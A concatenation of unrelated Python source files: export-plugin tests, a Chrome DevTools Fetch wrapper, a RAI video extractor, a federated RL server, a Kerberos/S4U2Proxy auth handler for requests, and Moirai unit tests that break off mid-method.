testJsonPluginWritesUnicodeValuesCorrectly(self): zip_fd, prefix = self.ProcessValuesToZip({ rdf_client_fs.StatEntry: [ rdf_client_fs.StatEntry( pathspec=rdf_paths.PathSpec(path="/中国新闻网新闻中", pathtype="OS")) ] }) self.assertEqual( set(zip_fd.namelist()), { "%s/MANIFEST" % prefix, "%s/ExportedFile/from_StatEntry.json" % prefix }) parsed_output = json.loads( zip_fd.read("%s/ExportedFile/from_StatEntry.json" % prefix)) self.assertLen(parsed_output, 1) self.assertEqual(parsed_output[0]["urn"], "aff4:/%s/fs/os/中国新闻网新闻中" % self.client_id) def testJsonPluginWritesMoreThanOnePatchOfRowsCorrectly(self): num_rows = self.__class__.plugin_cls.ROW_BATCH * 2 + 1 responses = [] for i in range(num_rows): responses.append( rdf_client_fs.StatEntry( pathspec=rdf_paths.PathSpec( path="/foo/bar/%d" %i, pathtype="OS"))) zip_fd, prefix = self.ProcessValuesToZip( {rdf_client_fs.StatEntry: responses}) parsed_output = json.loads( zip_fd.read("%s/ExportedFile/from_StatEntry.json" % prefix)) self.assertLen(parsed_output, num_rows) for i in range(num_rows): self.assertEqual(parsed_output[i]["urn"], "aff4:/%s/fs/os/foo/bar/%d" % (self.client_id, i)) def main(argv): test_lib.main(argv) if __name__ == "__main__": app.run(main)
<reponame>Phill240/chrome-remote-interface-py """This is an auto-generated file. Modify at your own risk""" from typing import Awaitable, Any, Callable, Dict, List, Optional, Union, TYPE_CHECKING if TYPE_CHECKING: from cripy import ConnectionType, SessionType __all__ = ["Fetch"] class Fetch: """ A domain for letting clients substitute browser's network layer with client code. Domain Dependencies: * Network * IO * Page Status: Experimental See `https://chromedevtools.github.io/devtools-protocol/tot/Fetch` """ __slots__ = ["client"] def __init__(self, client: Union["ConnectionType", "SessionType"]) -> None: """Initialize a new instance of Fetch :param client: The client instance to be used to communicate with the remote browser instance """ self.client: Union["ConnectionType", "SessionType"] = client def disable(self) -> Awaitable[Dict]: """ Disables the fetch domain. See `https://chromedevtools.github.io/devtools-protocol/tot/Fetch#method-disable` :return: The results of the command """ return self.client.send("Fetch.disable", {}) def enable( self, patterns: Optional[List[Dict[str, Any]]] = None, handleAuthRequests: Optional[bool] = None, ) -> Awaitable[Dict]: """ Enables issuing of requestPaused events. A request will be paused until client calls one of failRequest, fulfillRequest or continueRequest/continueWithAuth. See `https://chromedevtools.github.io/devtools-protocol/tot/Fetch#method-enable` :param patterns: If specified, only requests matching any of these patterns will produce fetchRequested event and will be paused until clients response. If not set, all requests will be affected. :param handleAuthRequests: If true, authRequired events will be issued and requests will be paused expecting a call to continueWithAuth. 
:return: The results of the command """ msg = {} if patterns is not None: msg["patterns"] = patterns if handleAuthRequests is not None: msg["handleAuthRequests"] = handleAuthRequests return self.client.send("Fetch.enable", msg) def failRequest(self, requestId: str, errorReason: str) -> Awaitable[Dict]: """ Causes the request to fail with specified reason. See `https://chromedevtools.github.io/devtools-protocol/tot/Fetch#method-failRequest` :param requestId: An id the client received in requestPaused event. :param errorReason: Causes the request to fail with the given reason. :return: The results of the command """ return self.client.send( "Fetch.failRequest", {"requestId": requestId, "errorReason": errorReason} ) def fulfillRequest( self, requestId: str, responseCode: int, responseHeaders: List[Dict[str, Any]], body: Optional[str] = None, responsePhrase: Optional[str] = None, ) -> Awaitable[Dict]: """ Provides response to the request. See `https://chromedevtools.github.io/devtools-protocol/tot/Fetch#method-fulfillRequest` :param requestId: An id the client received in requestPaused event. :param responseCode: An HTTP response code. :param responseHeaders: Response headers. :param body: A response body. :param responsePhrase: A textual representation of responseCode. If absent, a standard phrase mathcing responseCode is used. :return: The results of the command """ msg = { "requestId": requestId, "responseCode": responseCode, "responseHeaders": responseHeaders, } if body is not None: msg["body"] = body if responsePhrase is not None: msg["responsePhrase"] = responsePhrase return self.client.send("Fetch.fulfillRequest", msg) def continueRequest( self, requestId: str, url: Optional[str] = None, method: Optional[str] = None, postData: Optional[str] = None, headers: Optional[List[Dict[str, Any]]] = None, ) -> Awaitable[Dict]: """ Continues the request, optionally modifying some of its parameters. 
See `https://chromedevtools.github.io/devtools-protocol/tot/Fetch#method-continueRequest` :param requestId: An id the client received in requestPaused event. :param url: If set, the request url will be modified in a way that's not observable by page. :param method: If set, the request method is overridden. :param postData: If set, overrides the post data in the request. :param headers: If set, overrides the request headrts. :return: The results of the command """ msg = {"requestId": requestId} if url is not None: msg["url"] = url if method is not None: msg["method"] = method if postData is not None: msg["postData"] = postData if headers is not None: msg["headers"] = headers return self.client.send("Fetch.continueRequest", msg) def continueWithAuth( self, requestId: str, authChallengeResponse: Dict[str, Any] ) -> Awaitable[Dict]: """ Continues a request supplying authChallengeResponse following authRequired event. See `https://chromedevtools.github.io/devtools-protocol/tot/Fetch#method-continueWithAuth` :param requestId: An id the client received in authRequired event. :param authChallengeResponse: Response to with an authChallenge. :return: The results of the command """ return self.client.send( "Fetch.continueWithAuth", {"requestId": requestId, "authChallengeResponse": authChallengeResponse}, ) def getResponseBody(self, requestId: str) -> Awaitable[Dict]: """ Causes the body of the response to be received from the server and returned as a single string. May only be issued for a request that is paused in the Response stage and is mutually exclusive with takeResponseBodyForInterceptionAsStream. Calling other methods that affect the request or disabling fetch domain before body is received results in an undefined behavior. See `https://chromedevtools.github.io/devtools-protocol/tot/Fetch#method-getResponseBody` :param requestId: Identifier for the intercepted request to get body for. 
:return: The results of the command """ return self.client.send("Fetch.getResponseBody", {"requestId": requestId}) def takeResponseBodyAsStream(self, requestId: str) -> Awaitable[Dict]: """ Returns a handle to the stream representing the response body. The request must be paused in the HeadersReceived stage. Note that after this command the request can't be continued as is -- client either needs to cancel it or to provide the response body. The stream only supports sequential read, IO.read will fail if the position is specified. This method is mutually exclusive with getResponseBody. Calling other methods that affect the request or disabling fetch domain before body is received results in an undefined behavior. See `https://chromedevtools.github.io/devtools-protocol/tot/Fetch#method-takeResponseBodyAsStream` :param requestId: The requestId :return: The results of the command """ return self.client.send( "Fetch.takeResponseBodyAsStream", {"requestId": requestId} ) def requestPaused( self, listener: Optional[Callable[[Dict[str, Any]], Any]] = None ) -> Any: """ Issued when the domain is enabled and the request URL matches the specified filter. The request is paused until the client responds with one of continueRequest, failRequest or fulfillRequest. The stage of the request can be determined by presence of responseErrorReason and responseStatusCode -- the request is at the response stage if either of these fields is present and in the request stage otherwise. 
See `https://chromedevtools.github.io/devtools-protocol/tot/Fetch#event-requestPaused` :param listener: Optional listener function :return: If a listener was supplied the return value is a callable that will remove the supplied listener otherwise a future that resolves with the value of the event """ event_name = "Fetch.requestPaused" if listener is None: future = self.client.loop.create_future() def _listener(event: Optional[Dict] = None) -> None: future.set_result(event) self.client.once(event_name, _listener) return future self.client.on(event_name, listener) return lambda: self.client.remove_listener(event_name, listener) def authRequired( self, listener: Optional[Callable[[Dict[str, Any]], Any]] = None ) -> Any: """ Issued when the domain is enabled with handleAuthRequests set to true. The request is paused until client responds with continueWithAuth. See `https://chromedevtools.github.io/devtools-protocol/tot/Fetch#event-authRequired` :param listener: Optional listener function :return: If a listener was supplied the return value is a callable that will remove the supplied listener otherwise a future that resolves with the value of the event """ event_name = "Fetch.authRequired" if listener is None: future = self.client.loop.create_future() def _listener(event: Optional[Dict] = None) -> None: future.set_result(event) self.client.once(event_name, _listener) return future self.client.on(event_name, listener) return lambda: self.client.remove_listener(event_name, listener)
from __future__ import unicode_literals import re from .common import InfoExtractor from ..compat import ( compat_urllib_parse, compat_urlparse, ) from ..utils import ( parse_duration, unified_strdate, ) class RaiIE(InfoExtractor): _VALID_URL = r'(?P<url>(?P<host>http://(?:.+?\.)?(?:rai\.it|rai\.tv|rainews\.it))/dl/.+?-(?P<id>[\da-f]{8}-[\da-f]{4}-[\da-f]{4}-[\da-f]{4}-[\da-f]{12})(?:-.+?)?\.html)' _TESTS = [ { 'url': 'http://www.rai.tv/dl/RaiTV/programmi/media/ContentItem-cb27157f-9dd0-4aee-b788-b1f67643a391.html', 'md5': 'c064c0b2d09c278fb293116ef5d0a32d', 'info_dict': { 'id': 'cb27157f-9dd0-4aee-b788-b1f67643a391', 'ext': 'mp4', 'title': 'Report del 07/04/2014', 'description': 'md5:f27c544694cacb46a078db84ec35d2d9', 'upload_date': '20140407', 'duration': 6160, } }, { 'url': 'http://www.raisport.rai.it/dl/raiSport/media/rassegna-stampa-04a9f4bd-b563-40cf-82a6-aad3529cb4a9.html', 'md5': '8bb9c151924ce241b74dd52ef29ceafa', 'info_dict': { 'id': '04a9f4bd-b563-40cf-82a6-aad3529cb4a9', 'ext': 'mp4', 'title': 'TG PRIMO TEMPO', 'description': '', 'upload_date': '20140612', 'duration': 1758, }, 'skip': 'Error 404', }, { 'url': 'http://www.rainews.it/dl/rainews/media/state-of-the-net-Antonella-La-Carpia-regole-virali-7aafdea9-0e5d-49d5-88a6-7e65da67ae13.html', 'md5': '35cf7c229f22eeef43e48b5cf923bef0', 'info_dict': { 'id': '7aafdea9-0e5d-49d5-88a6-7e65da67ae13', 'ext': 'mp4', 'title': 'State of the Net, Antonella La Carpia: regole virali', 'description': 'md5:b0ba04a324126903e3da7763272ae63c', 'upload_date': '20140613', }, 'skip': 'Error 404', }, { 'url': 'http://www.rai.tv/dl/RaiTV/programmi/media/ContentItem-b4a49761-e0cc-4b14-8736-2729f6f73132-tg2.html', 'md5': '35694f062977fe6619943f08ed935730', 'info_dict': { 'id': 'b4a49761-e0cc-4b14-8736-2729f6f73132', 'ext': 'mp4', 'title': 'Alluvione in Sardegna e dissesto idrogeologico', 'description': 'Edizione delle ore 20:30 ', } }, { 'url': 
'http://www.ilcandidato.rai.it/dl/ray/media/Il-Candidato---Primo-episodio-Le-Primarie-28e5525a-b495-45e8-a7c3-bc48ba45d2b6.html', 'md5': '02b64456f7cc09f96ff14e7dd489017e', 'info_dict': { 'id': '28e5525a-b495-45e8-a7c3-bc48ba45d2b6', 'ext': 'flv', 'title': 'Il Candidato - Primo episodio: "Le Primarie"', 'description': 'Primo appuntamento con "Il candidato" con <NAME>, alias <NAME> presidente!', 'uploader': 'RaiTre', } }, { 'url': 'http://www.report.rai.it/dl/Report/puntata/ContentItem-0c7a664b-d0f4-4b2c-8835-3f82e46f433e.html', 'md5': '037104d2c14132887e5e4cf114569214', 'info_dict': { 'id': '0c7a664b-d0f4-4b2c-8835-3f82e46f433e', 'ext': 'flv', 'title': 'Il pacco', 'description': 'md5:4b1afae1364115ce5d78ed83cd2e5b3a', 'uploader': 'RaiTre', 'upload_date': '20141221', }, } ] def _extract_relinker_url(self, webpage): return self._proto_relative_url(self._search_regex( [r'name="videourl" content="([^"]+)"', r'var\s+videoURL(?:_MP4)?\s*=\s*"([^"]+)"'], webpage, 'relinker url', default=None)) def _real_extract(self, url): mobj = re.match(self._VALID_URL, url) video_id = mobj.group('id') host = mobj.group('host') webpage = self._download_webpage(url, video_id) relinker_url = self._extract_relinker_url(webpage) if not relinker_url: iframe_url = self._search_regex( [r'<iframe[^>]+src="([^"]*/dl/[^"]+\?iframe\b[^"]*)"', r'drawMediaRaiTV\(["\'](.+?)["\']'], webpage, 'iframe') if not iframe_url.startswith('http'): iframe_url = compat_urlparse.urljoin(url, iframe_url) webpage = self._download_webpage( iframe_url, video_id) relinker_url = self._extract_relinker_url(webpage) relinker = self._download_json( '%s&output=47' % relinker_url, video_id) media_url = relinker['video'][0] ct = relinker.get('ct') if ct == 'f4m': formats = self._extract_f4m_formats( media_url + '&hdcore=3.7.0&plugin=aasp-3.7.0.39.44', video_id) else: formats = [{ 'url': media_url, 'format_id': ct, }] json_link = self._html_search_meta( 'jsonlink', webpage, 'JSON link', default=None) if json_link: media = 
self._download_json( host + json_link, video_id, 'Downloading video JSON') title = media.get('name') description = media.get('desc') thumbnail = media.get('image_300') or media.get('image_medium') or media.get('image') duration = parse_duration(media.get('length')) uploader = media.get('author') upload_date = unified_strdate(media.get('date')) else: title = (self._search_regex( r'var\s+videoTitolo\s*=\s*"(.+?)";', webpage, 'title', default=None) or self._og_search_title(webpage)).replace('\\"', '"') description = self._og_search_description(webpage) thumbnail = self._og_search_thumbnail(webpage) duration = None uploader = self._html_search_meta('Editore', webpage, 'uploader') upload_date = unified_strdate(self._html_search_meta( 'item-date', webpage, 'upload date', default=None)) subtitles = self.extract_subtitles(video_id, webpage) return { 'id': video_id, 'title': title, 'description': description, 'thumbnail': thumbnail, 'uploader': uploader, 'upload_date': upload_date, 'duration': duration, 'formats': formats, 'subtitles': subtitles, } def _get_subtitles(self, video_id, webpage): subtitles = {} m = re.search(r'<meta name="closedcaption" content="(?P<captions>[^"]+)"', webpage) if m: captions = m.group('captions') STL_EXT = '.stl' SRT_EXT = '.srt' if captions.endswith(STL_EXT): captions = captions[:-len(STL_EXT)] + SRT_EXT subtitles['it'] = [{ 'ext': 'srt', 'url': 'http://www.rai.tv%s' % compat_urllib_parse.quote(captions), }] return subtitles
<reponame>Emilie-Thome/Multi-Agent-RL import numpy as np import random import sys from rllab.misc import logger from rllab.misc.overrides import overrides from rllab.algos.batch_polopt import BatchPolopt from rllab.algos.agent import Agent from rllab.optimizers.first_order_optimizer import FirstOrderOptimizer from rllab.core.serializable import Serializable class Server(BatchPolopt, Serializable): def __init__(self, agents_number, average_period, participation_rate, env, policy, baseline, difference_params=False, quantize=False, quantization_tuning=4, optimizer=None, optimizer_args=None, **kwargs): Serializable.quick_init(self, locals()) if optimizer is None: default_args = dict( batch_size=None, max_epochs=1, ) if optimizer_args is None: optimizer_args = default_args else: optimizer_args = dict(default_args, **optimizer_args) optimizer = [FirstOrderOptimizer(**optimizer_args)] * agents_number self.agents = [Agent(env=env, policy=policy, optimizer=optimizer, baseline=baseline, difference_params=difference_params, quantize=quantize, quantization_tuning=quantization_tuning, **kwargs) for optimizer in optimizer] self.baseline = baseline self.average_period = average_period self.participation_rate = participation_rate self.transferred_bits = 0 super(Server, self).__init__(agents_number=agents_number, average_period=average_period, participation_rate=participation_rate, env=env, policy=policy, baseline=baseline, difference_params=difference_params, quantize=quantize, quantization_tuning=quantization_tuning, optimizer=optimizer, optimizer_args=optimizer_args, **kwargs) @overrides def start_worker(self): for agent in self.agents: agent.start_worker() @overrides def shutdown_worker(self): for agent in self.agents: agent.shutdown_worker() @overrides def init_opt(self): for agent in self.agents: agent.init_opt() def obtain_samples(self, itr): paths_n = [] for agent in self.agents: paths_n.append(agent.sampler.obtain_samples(itr)) return paths_n def process_samples(self, itr, 
paths_n): samples_data_n = [] for paths, agent in zip(paths_n, self.agents): samples_data_n.append(agent.sampler.process_samples(itr, paths)) return samples_data_n @overrides def log_diagnostics(self, paths_n): for paths, agent in zip(paths_n, self.agents): agent.log_diagnostics(paths) def optimize_agents_policies(self, itr, samples_data_n): for samples_data, agent in zip(samples_data_n, self.agents): agent.optimize_policy(itr, samples_data) def generate_participants(self): agents = self.agents nb_participants = int(self.participation_rate*len(agents)) participants = set() while len(participants) != nb_participants: participants.update({agents[random.randrange(len(agents))]}) return participants def collect_delta_policy_params(self, participants): return [agent.transmit_server() for agent in participants] @overrides def optimize_policy(self): participants = self.generate_participants() delta_policy_params_n = self.collect_delta_policy_params(participants) for k, agent in enumerate(participants): self.transferred_bits += sys.getsizeof(delta_policy_params_n[k]) delta_policy_params_mean = np.average(delta_policy_params_n, axis=0) for agent in self.agents: agent.server_update_mean_policy(delta_policy_params_mean) if agent in participants: agent.server_update_policy() @overrides def get_itr_snapshot(self, itr): return dict( itr=itr, policy=self.policy, baseline=self.baseline, env=self.env, ) @overrides def train(self): self.start_worker() self.init_opt() for itr in range(self.current_itr, self.n_itr): with logger.prefix('itr #%d | ' % itr): paths_n = self.obtain_samples(itr) samples_data_n = self.process_samples(itr, paths_n) self.log_diagnostics(paths_n) # print('Average Return:', np.mean([sum(path["rewards"])for paths in paths_n for path in paths])) self.optimize_agents_policies(itr, samples_data_n) if itr and (itr % self.average_period == 0): self.optimize_policy() logger.log("saving snapshot...") params = self.get_itr_snapshot(itr) self.current_itr = itr + 1 
params["algo"] = self logger.record_tabular('TransfBits',self.transferred_bits) # print([str(rew) + '*' + str(self.discount) + '^' + str(k) for k, rew in enumerate(paths_n[0][0]['rewards'])]) returns = [sum([rew*(self.discount**k) for k, rew in enumerate(path['rewards'])]) for paths in paths_n for path in paths] average_returns = np.mean(returns) # print(average_returns) # print(returns) logger.record_tabular('TotalAverageReturn', average_returns) logger.save_itr_params(itr, params) logger.log("saved") logger.dump_tabular(with_prefix=False) if (self.n_itr - 1) % self.average_period != 0 : self.optimize_policy() logger.log("saving snapshot...") params = self.get_itr_snapshot(self.n_itr - 1) params["algo"] = self logger.record_tabular('TransfBits',self.transferred_bits) average_returns = np.mean(np.array([path['returns'][0] for paths in paths_n for path in paths])) logger.record_tabular('TotalAverageReturn', np.mean(average_returns)) logger.save_itr_params(self.n_itr - 1, params) logger.log("saved") logger.dump_tabular(with_prefix=False) self.shutdown_worker() return np.mean([sum(path["rewards"])for paths in paths_n for path in paths])
<reponame>danderwald/s4u2p ''' Created on 22.05.2012 @author: norman ''' from requests.auth import AuthBase from requests.compat import urlparse from requests import get as reqget from requests import session import kerberos as k import s4u2p import re import logging def getLogger(): log = logging.getLogger("http_kerberos_auth_handler") handler = logging.StreamHandler() formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s') handler.setFormatter(formatter) log.addHandler(handler) return log log = getLogger() class HTTPKerberosAuth(AuthBase): """Attaches Kerberos Authentication to the given Request object.""" rx = re.compile('(?:.*,)*\s*Negotiate\s*([^,]*),?', re.I) auth_header = 'www-authenticate' def __init__(self, as_user=None, spn=None, gssflags=k.GSS_C_MUTUAL_FLAG|k.GSS_C_SEQUENCE_FLAG): self.retried = 0 self.context = None self.gssflags=gssflags self.spn = spn if as_user: self.gss_step = s4u2p.authGSSImpersonationStep self.gss_response = s4u2p.authGSSImpersonationResponse self.gss_clean = s4u2p.authGSSImpersonationClean self.gss_init = lambda *args: s4u2p.authGSSImpersonationInit(as_user, *args) self.GSSError = s4u2p.GSSError else: self.gss_step = k.authGSSClientStep self.gss_response = k.authGSSClientResponse self.gss_clean = k.authGSSClientClean self.gss_init = k.authGSSClientInit self.GSSError = k.GSSError def negotiate_value(self, headers): """checks for "Negotiate" in proper auth header """ authreq = headers.get(self.auth_header, None) if authreq: log.debug("authreq: %s", authreq) mo = self.rx.search(authreq) if mo: return mo.group(1) else: log.debug("regex failed on: %s" % authreq) else: log.debug("%s header not found" % self.auth_header) return None def get_spn(self, r): if self.spn is None: domain = urlparse(r.url).hostname self.spn = spn = "HTTP@%s" % domain log.debug("calculated SPN as %s" % spn) return self.spn def handle_401(self, r): """Takes the given response and tries kerberos negotiation, if needed.""" ret = r 
r.request.deregister_hook('response', self.handle_401) neg_value = self.negotiate_value(r.headers) #Check for auth_header firstround = False if neg_value is not None: if self.context is None: spn = self.get_spn(r) result, self.context = self.gss_init(spn, self.gssflags) if result < 1: log.warning("gss_init returned result %d" % result) return None firstround = False log.debug("gss_init() succeeded") result = self.gss_step(self.context, neg_value) if result < 0: self.gss_clean(self.context) self.context = None log.warning("gss_step returned result %d" % result) return None log.debug("gss_step() succeeded") if result == k.AUTH_GSS_CONTINUE or (result == k.AUTH_GSS_COMPLETE and not (self.gssflags & k.GSS_C_MUTUAL_FLAG) and firstround): response = self.gss_response(self.context) r.request.headers['Authorization'] = "Negotiate %s" % response r.request.send(anyway=True) _r = r.request.response _r.history.append(r) ret = _r if result == k.AUTH_GSS_COMPLETE and self.context: self.gss_clean(self.context) self.context = None return ret def __call__(self, r): r.register_hook('response', self.handle_401) return r def test(args): log.setLevel(logging.DEBUG) log.info("starting test") if args.keytab: s4u2p.authGSSKeytab(args.keytab) s = session(auth=HTTPKerberosAuth(as_user=args.user, spn=args.spn)) r=s.get(args.url) print r.text # if website is set up to keep auth, the next calls will not authenticate again # (in IIS accomplish this by setting the windowsAuthentication properties: authPersistNonNTLM="true" and authPersistSingleRequest="false") # for i in range(20): # r=s.get(args.url) # print i, r.text if __name__ == '__main__': import argparse parser = argparse.ArgumentParser(description="Kerberos authentication handler for the requests package.") parser.add_argument("--user", dest="user", help="user to impersonate, otherwise the current kerberos principal will be used", default=None) parser.add_argument("--url", dest="url", help="kerberos protected site") 
parser.add_argument("--spn", dest="spn", help="spn to use, if not given HTTP@domain will be used") parser.add_argument("--keytab", dest="keytab", help="path to keytab if you won't use system's default one (only needed for impersonation)", default=None) args = parser.parse_args() test(args)
# # Copyright 2015 LinkedIn Corp. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # import unittest import os import subprocess import shutil import simoorg.moirai as Moirai import simoorg.Api.ApiConstants as ApiConstants import json import time import yaml # Assuming a flat collection of tests MOIRAI_CONFIG_DIR = (os.path.dirname(os.path.realpath(__file__)) + "/unittest_configs/moirai_configs/") # Here we have three sets of configurations # A correct one - sample_base # An incorrect on (missing service name) - sample_incorrect # A configuration directory that is missing all the files - sample_missing CORRECT_FATEBOOK = "sample_base/" INCORRECT_FATEBOOK = "sample_incorrect/" MISSING_FATEBOOK = "sample_missing/" MISSING_API_CONFIGS = "sample_missing_api/" IMPOSSIBLE_API_CONFIGS = "sample_impossible_api/" COUNT_FATE = ['ps', 'aux'] TMP_FIFO = "/tmp/test.fifo" TEST_DIR = os.path.dirname(os.path.realpath(__file__)) DUMMY_HEALTHCHECK_SRC = (TEST_DIR + "/unittest_configs/dummy_healthcheck/" + "dummy.sh") DUMMY_HEALTHCHECK_DST = "/tmp/dummy.sh" class TestMoirai(unittest.TestCase): """ In this test set we want to test three different behavior of Moirai 1. When some required configs are missing 2. When some config is incorrect (missing service name in fatebook) 3. 
Correct behavior of moirai """

    def setUp(self):
        # Install the dummy healthcheck script that the fate books reference
        # and mark it executable (0744); abort the test run if that fails.
        try:
            shutil.copyfile(DUMMY_HEALTHCHECK_SRC, DUMMY_HEALTHCHECK_DST)
            os.chmod(DUMMY_HEALTHCHECK_DST, 0744)
        except:
            print ("Unable to write to file " + DUMMY_HEALTHCHECK_DST)
            raise

    def tearDown(self):
        # Remove the dummy healthcheck and best-effort close the moirai fifo.
        # NOTE(review): moirai_fifo_fd is the raw int returned by os.open(),
        # which has no close() method, so this call presumably always lands in
        # the except branch; the wrapping file object is moirai_fifo_file --
        # confirm which handle was meant to be closed here.
        os.remove(DUMMY_HEALTHCHECK_DST)
        try:
            self.moirai_fifo_fd.close()
        except:
            print ("Skipping moirai_fifo_fd close")

    def test_missing_configs(self):
        """ We expect moirai to raise an exception when fatebooks are missing """
        moirai_obj = Moirai.Moirai(MOIRAI_CONFIG_DIR + MISSING_FATEBOOK)
        caught_exception_flag = False
        try:
            moirai_obj.spawn_atropos()
        except:
            caught_exception_flag = True
        # Fail explicitly when no exception was raised.
        if not caught_exception_flag:
            self.assert_(caught_exception_flag)

    def test_missing_api_configs(self):
        """ We expect moirai to raise an exception when api configs are missing """
        caught_exception_flag = False
        try:
            moirai_obj = Moirai.Moirai(MOIRAI_CONFIG_DIR + MISSING_API_CONFIGS)
            moirai_obj.spawn_atropos()
        except IOError:
            # Only IOError counts as the expected failure mode here.
            caught_exception_flag = True
        if not caught_exception_flag:
            self.assert_(caught_exception_flag)

    def test_incorrect_configs(self):
        """ We expect moirai to raise an exception when fatebooks are missing
            service name """
        moirai_obj = Moirai.Moirai(MOIRAI_CONFIG_DIR + INCORRECT_FATEBOOK)
        caught_exception_flag = False
        try:
            moirai_obj.spawn_atropos()
        except:
            caught_exception_flag = True
        if not caught_exception_flag:
            # Clean up the (unexpectedly live) instance before failing.
            moirai_obj.finish()
            self.assert_(caught_exception_flag)

    def test_moirai(self):
        """ Test the correct behavior of Moirai """
        moirai_obj = Moirai.Moirai(MOIRAI_CONFIG_DIR + CORRECT_FATEBOOK)
        moirai_obj.spawn_atropos()
        expected_army_size = len(
            os.listdir(MOIRAI_CONFIG_DIR + CORRECT_FATEBOOK + 'fate_books/'))
        # Check if the number of items in atropos army list is
        # same as the number of files in fate_books dir
        self.assertEqual(expected_army_size, len(moirai_obj.atropos_army))
        # Next few checks expect the atropos instance to be running.
        # Hence, for these checks to pass, the runtime on the configs should
        # be at least a few minutes.
        for service, atropos_inst in moirai_obj.atropos_army.iteritems():
            # Shell pipeline equivalent: ps ax | awk '{print $1}' | grep <pid> | wc -l
            # i.e. count how many live processes match this atropos pid.
            all_procs = subprocess.Popen(['ps', 'ax', ],
                                         stdout=subprocess.PIPE)
            all_pids = subprocess.Popen(['awk', '{print $1}'],
                                        stdin=all_procs.stdout,
                                        stdout=subprocess.PIPE)
            fate_procs = subprocess.Popen(['grep', str(atropos_inst.pid), ],
                                          stdin=all_pids.stdout,
                                          stdout=subprocess.PIPE)
            fate_count_command = subprocess.Popen(['wc', '-l', ],
                                                  stdin=fate_procs.stdout,
                                                  stdout=subprocess.PIPE)
            fate_count = int(
                fate_count_command.stdout.readline().strip())
            # Exactly one process per spawned atropos instance.
            self.assertEqual(fate_count, 1)
            # time.sleep(1)
        moirai_obj.finish()

    def execute_command(self, command, args, method='GET'):
        """ Send message to moirai

        Writes a JSON command to moirai's input fifo and polls our own api
        fifo for the JSON reply.

        command -- command name string (e.g. 'list', 'plan')
        args    -- dict of command arguments
        method  -- HTTP-style method string, defaults to 'GET'

        Returns (0, output) on success, or (-1, error_message) on any
        connect / write / timeout / decode / command-id-mismatch failure.
        """
        # Open moirai's fifo non-blocking for writing; failure means the
        # service is not listening.
        try:
            self.moirai_fifo_fd = os.open(
                self.api_config['moirai_input_fifo'],
                os.O_WRONLY | os.O_NONBLOCK)
            self.moirai_fifo_file = os.fdopen(self.moirai_fifo_fd, 'w')
        except:
            self.moirai_fifo_fd = None
            return (-1, "Unable to connect to Moirai Service")
        # Monotonically increasing id lets us match replies to requests.
        self.command_id = self.command_id + 1
        command_map = {ApiConstants.FIFO_ENDPOINT_KEY: self.api_fifo_path,
                       ApiConstants.COMMAND_ID_KEY: self.command_id,
                       ApiConstants.COMMAND_KEY: command,
                       ApiConstants.ARGS_KEY: args,
                       ApiConstants.METHOD_KEY: method}
        command_string = json.dumps(command_map) + '\n'
        try:
            self.moirai_fifo_file.write(command_string)
            self.moirai_fifo_file.flush()
        except IOError:
            op_msg = ("Unable to communicate with moirai")
            print ("LOG: " + op_msg)
            return (-1, op_msg)
        except OSError:
            self.moirai_fifo_fd = None
            op_msg = ("Unable to communicate with moirai")
            print ("LOG: " + op_msg)
            return (-1, op_msg)
        # Read from api fifo: busy-poll the non-blocking fd until data
        # arrives or READ_TIMEOUT_SECS elapses.
        start_time = time.time()
        output_string = ''
        while output_string == '':
            try:
                output_string = self.api_fifo_file.read()
            except IOError:
                # Non-blocking read with no data ready; keep polling.
                pass
            current_time = time.time()
            if current_time - start_time > ApiConstants.READ_TIMEOUT_SECS:
                op_msg = ("No message recieved from Moirai")
                print ("LOG: " + op_msg)
                return (-1, op_msg)
        try:
            output_obj = json.loads(output_string)
        except ValueError:
            op_msg = ("Recieved object is not a json object")
            print ("LOG: " + op_msg)
            return (-1, op_msg)
        # Reject replies that answer some other request.
        if (output_obj[ApiConstants.COMMAND_ID_KEY] != self.command_id):
            op_msg = ("Recieved output with incorrect command id")
            print ("LOG: " + op_msg)
            return (-1, op_msg)
        return (0, output_obj[ApiConstants.COMMAND_OUTPUT_KEY])

    def execute_incorrect_command(self):
        """ Send message to moirai

        Deliberately writes a non-JSON payload to moirai's input fifo and
        verifies that no reply arrives within the (extended) timeout.

        Returns 0 if moirai stayed silent as expected, -1 if the read
        timed out (the success path for this negative test per the caller's
        `status != -1` check), -2 on connect/write failures.
        """
        try:
            self.moirai_fifo_fd = os.open(
                self.api_config['moirai_input_fifo'],
                os.O_WRONLY | os.O_NONBLOCK)
            self.moirai_fifo_file = os.fdopen(self.moirai_fifo_fd, 'w')
        except:
            self.moirai_fifo_fd = None
            return (-2, "Unable to connect to Moirai Service")
        self.command_id = self.command_id + 1
        # Intentionally malformed payload -- moirai should discard it.
        command_string = "NOT A JSON STRING"
        try:
            self.moirai_fifo_file.write(command_string)
            self.moirai_fifo_file.flush()
        except IOError:
            op_msg = ("Unable to communicate with moirai")
            print ("LOG: " + op_msg)
            return (-2, op_msg)
        except OSError:
            self.moirai_fifo_fd = None
            op_msg = ("Unable to communicate with moirai")
            print ("LOG: " + op_msg)
            return (-2, op_msg)
        # Longer timeout than the normal path: we are waiting to be sure
        # that NO reply arrives.
        NEW_READ_TIMEOUT_SECS = 20
        # Read from api fifo
        start_time = time.time()
        output_string = ''
        while output_string == '':
            try:
                output_string = self.api_fifo_file.read()
            except IOError:
                pass
            current_time = time.time()
            if current_time - start_time > NEW_READ_TIMEOUT_SECS:
                op_msg = ("No message recieved from Moirai")
                print ("LOG: " + op_msg)
                # NOTE(review): bare -1 (not a tuple) -- the caller relies on
                # this exact value; the connect/write paths return 2-tuples.
                return (-1)
        return 0

    def test_impossible_moiriai_fifo(self):
        """ Looks at the behaviour of moirai when an impossible path is
            provided to it """
        moirai_obj = Moirai.Moirai(MOIRAI_CONFIG_DIR + IMPOSSIBLE_API_CONFIGS)
        moirai_obj.spawn_atropos()
        # Give the api reader process a moment to die on the bad path.
        time.sleep(1)
        self.assert_(not moirai_obj.api_read_procs[0].is_alive())
        moirai_obj.finish()

    def test_moirai_api_commands(self):
        """ Test the api hooks for moirai """
        moirai_obj = Moirai.Moirai(MOIRAI_CONFIG_DIR + CORRECT_FATEBOOK)
        moirai_obj.spawn_atropos()
        # Expected payloads for the canned test_service fate book.
        expected_list_op = ['test_service']
        failure_list = ['test_failure']
